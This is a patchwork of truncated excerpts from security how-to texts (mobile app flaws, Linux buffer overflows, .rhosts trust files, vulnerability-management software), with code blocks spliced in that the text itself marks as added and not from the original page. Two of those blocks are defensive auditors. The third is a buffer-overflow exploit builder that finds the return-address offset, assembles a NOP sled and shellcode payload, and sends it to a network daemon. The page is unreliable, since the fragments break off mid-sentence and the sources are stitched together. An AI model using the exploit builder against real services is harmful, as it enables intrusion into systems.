Uncovering Mobile App Flaws

In addition to running a tool such as CxSuite to check for mobile app vulnerabilities, there are several other things you'll want to look for, including: cryptographic database keys that are hard-coded into the app; improper handling of sensitive information, such as storing personally identifiable information (PII) locally where the user and other apps can …
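The two flaws named above, hard-coded key material and PII written to local storage, are the kind of thing a quick source scan turns up before a full tool run. The scanner below is an added example, not code from the original page or from CxSuite; the Android-style Java snippet, the regexes and the list of storage APIs are constructed for the demo and are heuristics to be tuned per codebase.

```python
"""Added example (not from the original page): a heuristic source scanner for
hard-coded crypto keys and PII persisted to local storage. The Android-style
sample, the regexes and the API list are constructed for the demo."""
import os
import re

# String literal assigned to an identifier that names key material.
KEY_ASSIGN = re.compile(
    r'(?i)\b\w*(?:key|secret|password|passphrase|token)\w*\s*=\s*"([^"]{8,})"')
# Whole-literal hex of at least 16 bytes: typical AES key or IV size.
HEX_LITERAL = re.compile(r'"((?:[0-9a-fA-F]{2}){16,})"')
# Long base64 literal, often an embedded key or certificate.
B64_LITERAL = re.compile(r'"([A-Za-z0-9+/]{24,}={0,2})"')
KEY_PATTERNS = (KEY_ASSIGN, HEX_LITERAL, B64_LITERAL)

# Android APIs that persist data on the device (constructed list; extend it).
LOCAL_STORE = re.compile(
    r'getSharedPreferences|putString|openFileOutput|FileWriter|SQLiteDatabase')
# Legacy modes that make a file readable/writable by every other app.
WORLD_MODE = re.compile(r'MODE_WORLD_(?:READABLE|WRITEABLE)')
PII = re.compile(
    r'(?i)\b(?:ssn|social_?security|credit_?card|card_?number|dob|date_?of_?birth|email|phone)\b')


def scan_source(text):
    """Return [(line_no, category, evidence)] for one file's contents."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        stripped = line.strip()
        if stripped.startswith(("//", "*", "/*")):
            continue  # comment line: skip so TODO notes do not trigger hits
        for pat in KEY_PATTERNS:
            m = pat.search(line)
            if m:
                findings.append((n, "hardcoded-key", m.group(1)))
                break  # one key finding per line is enough
        if WORLD_MODE.search(line):
            findings.append((n, "world-accessible-storage", stripped))
        if PII.search(line) and LOCAL_STORE.search(line):
            findings.append((n, "pii-local-storage", stripped))
    return findings


def scan_tree(root, exts=(".java", ".kt", ".swift", ".m", ".xml", ".json")):
    """Walk a decompiled or source tree and collect findings per file."""
    report = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.endswith(exts):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = scan_source(fh.read())
                if hits:
                    report[path] = hits
    return report


# Constructed sample: an Android helper that shows both flaws.
SAMPLE = """\
public class DbHelper {
    // TODO: move the key to the Android Keystore before release
    private static final String DB_KEY = "0123456789abcdef0123456789abcdef";
    private static final String PREFS = "user_prefs";
    void save(Context ctx, String ssn) {
        SharedPreferences p = ctx.getSharedPreferences(PREFS, Context.MODE_WORLD_READABLE);
        p.edit().putString("ssn", ssn).apply();
    }
}
"""

if __name__ == "__main__":
    for n, cat, ev in scan_source(SAMPLE):
        print(f"line {n}: {cat}: {ev}")
```

Run `scan_tree` over the output of a decompiler (for example the `sources/` directory jadx produces) and triage each `hardcoded-key` hit by hand; a 32-hex-character literal next to a database open call is almost always a real finding, while a long base64 literal may be an embedded image.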

Messaging System Vulnerabilities

Practically all messaging applications are hacking targets on your network. Given the proliferation of, and business dependence on, e-mail, just about anything is fair game. Ditto with VoIP. It's downright scary what people with ill intent can do with it. With messaging systems, one underlying weakness is that many of the supporting protocols weren't designed with …

Checking Physical Security

Some Linux vulnerabilities involve the bad guy actually being at the system console, something that's entirely possible given the insider threats that every organization faces.

Physical security hacks

If an attacker is at the system console, anything goes, including rebooting the system (even if no one is logged in) by pressing Ctrl+Alt+Delete. After the …

Finding Buffer Overflow Vulnerabilities

RPC and other vulnerable daemons are common targets for buffer-overflow attacks. Buffer overflow attacks are often how the hacker gets in to modify system files, read database files, and more.

Attacks

In a buffer overflow attack, the attacker either manually sends strings of information to the victim Linux machine or writes a script to …
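The scripted side of such a test is more than sending a long string: the tester needs to know which bytes of the oversized input end up in the saved return address before a working payload can be built. The script below is an added example, not code from the original page; the listening host and port and the value read back from the crashed register are assumptions for the demo.

```python
"""Added example, not from the original page: the scripted side of a
buffer-overflow test. Builds the oversized input, uses a cyclic pattern to
find which bytes land in the saved return address, and assembles the final
payload. Target host/port and the crash value are assumptions for the demo."""
import socket
import string
import struct


def cyclic_pattern(length):
    """Non-repeating 'Aa0Aa1...' pattern (same scheme as Metasploit's
    pattern_create) so any 4-byte window maps back to a unique offset."""
    chunks = []
    for a in string.ascii_uppercase:
        for b in string.ascii_lowercase:
            for c in string.digits:
                chunks.append(a + b + c)
                if len(chunks) * 3 >= length:
                    return "".join(chunks)[:length]
    raise ValueError("pattern longer than 20280 bytes not supported")


def pattern_offset(value, length=20280):
    """Offset of the bytes that overwrote a register. `value` is either the
    4 ASCII chars seen in the crash or the little-endian int from EIP/RIP."""
    if isinstance(value, int):
        value = struct.pack("<I", value).decode("ascii")
    return cyclic_pattern(length).find(value)


def overflow_payload(offset, ret_addr, total_len, shellcode=b""):
    """Filler up to the return address, the address (little-endian), then a
    NOP sled and shellcode, padded so the whole send is total_len bytes."""
    body = b"A" * offset + struct.pack("<I", ret_addr)
    body += b"\x90" * (total_len - len(body) - len(shellcode)) + shellcode
    if len(body) != total_len:
        raise ValueError("offset + shellcode exceed total_len")
    return body


def send_to_daemon(host, port, data, timeout=5):
    """Deliver the input to the listening service (assumed TCP). Not called
    by the demo; use it only against a target you are authorised to test."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(data)
        try:
            return s.recv(4096)
        except socket.timeout:
            return b""


if __name__ == "__main__":
    # Step 1: send cyclic_pattern(2000) to the daemon, let it crash, and read
    # the faulting address from the core file or debugger. Assumed value here.
    crashed_with = 0x41316241            # "Ab1A" read back from EIP
    off = pattern_offset(crashed_with)   # 33
    # Step 2: rebuild the input with a chosen return address at that offset.
    payload = overflow_payload(off, 0xDEADBEEF, 256)
    print(f"return address sits at offset {off}; payload is {len(payload)} bytes")
```

On a 64-bit target the register holds 8 bytes; pass the low four bytes (or the 4 characters you see in the register) to `pattern_offset`, since the pattern's 3-character units make any 4-byte window unique.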

Securing the .rhosts and hosts.equiv Files

Linux, and all the flavors of UNIX, are file-based operating systems. Practically everything that's done on the system involves the manipulation of files. This is why so many attacks against Linux are at the file level.

Hacks using the hosts.equiv and .rhosts files

If hackers can capture a user ID and password by …
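Because these trust files are plain text, auditing them is a matter of reading each entry and the file's permission bits. The audit below is an added example, not the page's own code; entry syntax follows the traditional rhosts(5) format ("host [user]", "+" wildcards, "+@netgroup"), and the sample file contents and mode bits are constructed for the demo.

```python
"""Added example, not the page's own code: audit hosts.equiv and .rhosts
entries and permissions. Entry syntax follows the traditional rhosts(5)
format; the sample file and its mode bits are constructed for the demo."""
import os
import stat


def parse_rhosts(text):
    """Yield (host, user) pairs; user is None when a line names only a host."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        yield parts[0], (parts[1] if len(parts) > 1 else None)


def audit_rhosts(text, mode=0o600, owned_by_user=True):
    """Return [(severity, message)] for one trust file. `mode` is the file's
    permission bits; `owned_by_user` says whether the granting account owns it."""
    issues = []
    if mode & (stat.S_IWGRP | stat.S_IWOTH):
        issues.append(("critical", "file is group/world-writable: anyone can add a trust entry"))
    elif mode & (stat.S_IRGRP | stat.S_IROTH):
        issues.append(("low", "file is readable by others: reveals trusted hosts"))
    if not owned_by_user:
        issues.append(("high", "file not owned by the account it grants access to"))
    for host, user in parse_rhosts(text):
        if host == "+" and user == "+":
            issues.append(("critical", "'+ +' trusts every user on every host"))
        elif host == "+":
            issues.append(("critical", f"'+' trusts every host for user {user or 'of the same name'}"))
        elif user == "+":
            issues.append(("high", f"any user on {host} may log in without a password"))
        elif host.startswith("+@") or (user or "").startswith("+@"):
            issues.append(("medium", f"netgroup entry '{host} {user or ''}': scope depends on NIS"))
    return issues


def audit_file(path):
    """Audit a real file on disk, using its stat() mode and ownership."""
    st = os.stat(path)
    with open(path, encoding="utf-8", errors="replace") as fh:
        text = fh.read()
    return audit_rhosts(text, st.st_mode, st.st_uid == os.getuid())


# Constructed sample ~/.rhosts with the classic mistakes.
SAMPLE = """\
# constructed ~/.rhosts
+ +                     # legacy entry nobody remembers adding
trusted.example.com
+@admins
build.example.com +
"""

if __name__ == "__main__":
    for sev, msg in audit_rhosts(SAMPLE, mode=0o666):
        print(f"[{sev}] {msg}")
```

Run `audit_file` over /etc/hosts.equiv and every home directory's .rhosts; the cleanest result is that neither file exists and the r-services (rsh, rlogin, rexec) are disabled, since the files only matter when those daemons are listening.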

Cyber Security

Cyber security measures are associated with managing risks, patching vulnerabilities and improving system resilience. Key research subjects include techniques for detecting network behavior anomalies and malware, and questions related to IT security. Since these research subjects mainly concentrate on the physical, syntactic and semantic layers, present research infrastructures are focused on studying …

Commercial software: Not cheap, but has maintenance

The other option for running VM software yourself is to use commercial software. Most people automatically think of commercial software as a 'safe' option, and it usually constitutes the bulk of installed applications. But commercial software has drawbacks, so consider these points: Commercial software costs real money. You have to buy it, and that requires …

Open Source software: Free, but not cheap

Open Source software is usually developed in an open, collaborative manner. The software is typically free, and users are able to use, change, improve, or share it. However, three considerations about Open Source software don't bode well for use with VM: Questionable code. Open Source code is developed by the public, and you can't be …

Run Software Yourself

Software-based solutions enable you to install vulnerability management software on your internal network and run it yourself. Software can automate many VM processes. However, having control over VM software carries the usual price tag of having to manage it (and secure it). You have to successfully operate and maintain everything, in …

Identifying the vulnerability shortlist

The VM solution you select needs to provide the capability to scan for and fix vulnerabilities in a broad range of categories, including: Back doors and Trojan horses (bypass authentication systems). Brute force attacks (defeat cryptography by systematically trying different keys). CGI (exploits the Common Gateway Interface). Databases. DNS and BIND (exploits Domain Name …